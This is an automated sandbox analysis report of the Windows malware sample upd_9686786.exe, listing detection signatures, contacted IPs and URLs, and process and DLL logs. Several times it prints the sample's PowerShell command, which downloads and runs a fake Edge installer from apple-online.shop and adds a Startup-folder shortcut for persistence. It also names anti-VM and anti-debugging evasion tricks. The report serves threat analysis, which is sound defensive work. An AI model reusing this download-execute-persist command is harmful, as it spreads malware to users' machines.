Windows Analysis Report
upd_9686786.exe

Overview

General Information

Sample name: upd_9686786.exe
Analysis ID: 1523560
MD5: 22f545cf93f55d3294abbbc7bfbbd6b8
SHA1: 9f3fcce983368fe70ddf070919f2516981934885
SHA256: b93d7961d05376e6aa0e6d122ae50f34db078acc9e95ed6408f39750d386a74a
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Powershell creates an autostart link
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Source: upd_9686786.exe Static PE information: certificate valid
Source: upd_9686786.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ion.pdbS]K source: powershell.exe, 00000009.00000002.30279686077.00000215F4476000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.30276312197.0000020DF2D7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?t.Automation.pdb+ source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System32\wshom.ocxb.pdb^ source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb6.1.4.1.311. source: powershell.exe, 00000009.00000002.30274860324.0000020DF2CF4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdbb source: powershell.exe, 00000002.00000002.30012245368.00000177764AA000.00000004.00000020.00020000.00000000.sdmp
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 65.38.120.47 65.38.120.47
Source: Joe Sandbox View IP Address: 217.148.142.19 217.148.142.19
Source: Joe Sandbox View IP Address: 65.109.226.176 65.109.226.176
Source: C:\Users\user\Desktop\upd_9686786.exe Code function: 0_2_00007FF76E65568B recv,recv, 0_2_00007FF76E65568B
Source: powershell.exe, 00000002.00000002.29955133061.0000016F02B09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D82B02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apple-online.shop
Source: upd_9686786.exe String found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
Source: upd_9686786.exe String found in binary or memory: http://cevcsca2021.ocsp-certum.com07
Source: upd_9686786.exe String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF2A19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: upd_9686786.exe String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: upd_9686786.exe String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30264940359.0000020DF0A59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.29955133061.0000016F014F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F101BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F10079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: upd_9686786.exe String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: upd_9686786.exe String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000002.00000002.29955133061.0000016F0137B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F013A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D813A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: upd_9686786.exe String found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
Source: upd_9686786.exe String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D80001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: upd_9686786.exe String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: upd_9686786.exe String found in binary or memory: http://subca.ocsp-certum.com02
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00E9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D80E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000002.00000002.29955133061.0000016F0137B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F013A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D813A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: upd_9686786.exe String found in binary or memory: http://www.certum.pl/CPS0
Source: powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF2A19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D80001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.29955133061.0000016F02874000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F02B3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D82B38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8214C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apple-online.shop
Source: powershell.exe, 00000009.00000002.30156809218.0000020D82CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apple-online.shop/MicrosoftEdgeSetup.
Source: powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apple-online.shop/MicrosoftEdgeSetup.exe
Source: powershell.exe, 00000009.00000002.30278139073.0000020DF3640000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30264940359.0000020DF09D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apple-online.shop/microsoftedgesetup.exe
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000002.00000002.29955133061.0000016F0137B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F013A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D813A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 00000002.00000002.29955133061.0000016F02153000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8214C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.29955133061.0000016F014F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F101BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F10079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF2A19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000009.00000002.30156809218.0000020D80E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: upd_9686786.exe String found in binary or memory: https://www.certum.pl/CPS0
Source: upd_9686786.exe String found in binary or memory: https://www.globalsign.com/repository/0
Detected potential crypto function
Source: C:\Users\user\Desktop\upd_9686786.exe Code function: 0_2_00007FF76E653B6A 0_2_00007FF76E653B6A
Sample file is different than original file name gathered from version info
Source: upd_9686786.exe, 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamereinstated6 vs upd_9686786.exe
Source: upd_9686786.exe, 00000008.00000000.29967145448.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamereinstated6 vs upd_9686786.exe
Source: upd_9686786.exe Binary or memory string: OriginalFilenamereinstated6 vs upd_9686786.exe
Source: classification engine Classification label: mal60.evad.winEXE@18/6@0/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8636:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4684:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4684:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8636:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpsfeg15.nww.ps1 Jump to behavior
Source: upd_9686786.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\upd_9686786.exe "C:\Users\user\Desktop\upd_9686786.exe"
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: unknown Process created: C:\Users\user\Desktop\upd_9686786.exe "C:\Users\user\Desktop\upd_9686786.exe"
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()" Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()" Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
